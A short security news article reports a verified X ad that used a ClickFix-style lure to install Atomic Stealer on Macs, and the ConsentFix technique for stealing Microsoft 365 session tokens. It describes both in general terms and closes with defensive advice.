VYPR
researchPublished Jul 3, 2026· 1 source

Verified X Ad Spreads Mac Malware; ConsentFix Targets Microsoft Accounts

Cybercriminals are employing sophisticated social engineering tactics, using a verified X ad to distribute Mac malware and a new technique called ConsentFix to hijack Microsoft 365 accounts.

A recent campaign has leveraged a sponsored advertisement on the social media platform X, formerly Twitter, to distribute malware targeting macOS users. The malicious ad, posted from a verified account, aimed to lend an air of legitimacy to the scam. This attack utilized a ClickFix-style social engineering lure, presenting users with a fake download for "DynamicLake," a legitimate macOS utility designed to enhance the user interface by turning the device's notch into a functional version of Apple's Dynamic Island. The campaign's success relied on tricking users into opening their Terminal application and pasting commands that, unbeknownst to them, silently installed malware.

This multi-faceted attack combines several worrying trends in cybercrime. Firstly, it employs ClickFix-style social engineering, which depends on user interaction to execute malicious commands. Secondly, it uses lookalike domains that closely mimic trusted Mac applications, further deceiving potential victims. Finally, the abuse of paid advertising infrastructure, including verified accounts, allows attackers to scale their operations and reach a broader audience. The malware delivered in this campaign is reported to be various forms of the Atomic Stealer infostealer, designed to exfiltrate sensitive information from compromised systems.

The methodology echoes previous incidents where attackers have used platforms like Google Ads to promote fake software installers, often targeting users searching for legitimate developer tools. This highlights a critical vulnerability: verification badges and paid advertising placements are not foolproof indicators of safety, as attackers are adept at designing campaigns to bypass automated screening processes. The researchers who identified this campaign reported the malicious advertisement to X and contacted the account owner. The ad has since been removed from the platform.

In parallel, a separate technique known as ConsentFix is targeting Microsoft 365 accounts without resorting to traditional malware installation. This method focuses on social engineering users into voluntarily handing over their cloud login tokens through browser callbacks. Instead of asking for passwords or multi-factor authentication (MFA) codes, ConsentFix manipulates users into performing actions that grant attackers session tokens, effectively hijacking their accounts.

The ConsentFix attack chain can begin with seemingly innocuous actions, such as dragging a link into a browser. Within moments, an attacker can obtain the necessary tokens to take over a Microsoft 365 account, bypassing standard security measures. For instance, a phishing email might contain a link hosted on trusted platforms like Dropbox, sometimes protected by a password to evade security tool inspection. Upon clicking the link, the victim is presented with a page resembling a legitimate Microsoft sign-in portal.

The critical step involves the user being instructed to drag a localhost callback link into their browser. This action, performed without the user's full understanding, results in session tokens being transferred to the attacker. These tokens grant access to sensitive services like email and other Microsoft 365 applications, circumventing the need for passwords or MFA. This technique has reportedly been shared on cybercrime forums, making it accessible to less experienced threat actors looking to steal Microsoft 365 accounts.

To stay protected against these evolving threats, users are advised to exercise caution with unexpected links, regardless of their source, including verified accounts or sponsored search results. It is crucial to think critically before following unusual instructions and to always verify the address bar in the browser before entering credentials. Employing up-to-date anti-malware solutions with real-time web protection, such as the Malwarebytes Browser Guard extension, can also provide a vital layer of defense against malicious websites and social engineering attacks.

Synthesized by Vypr AI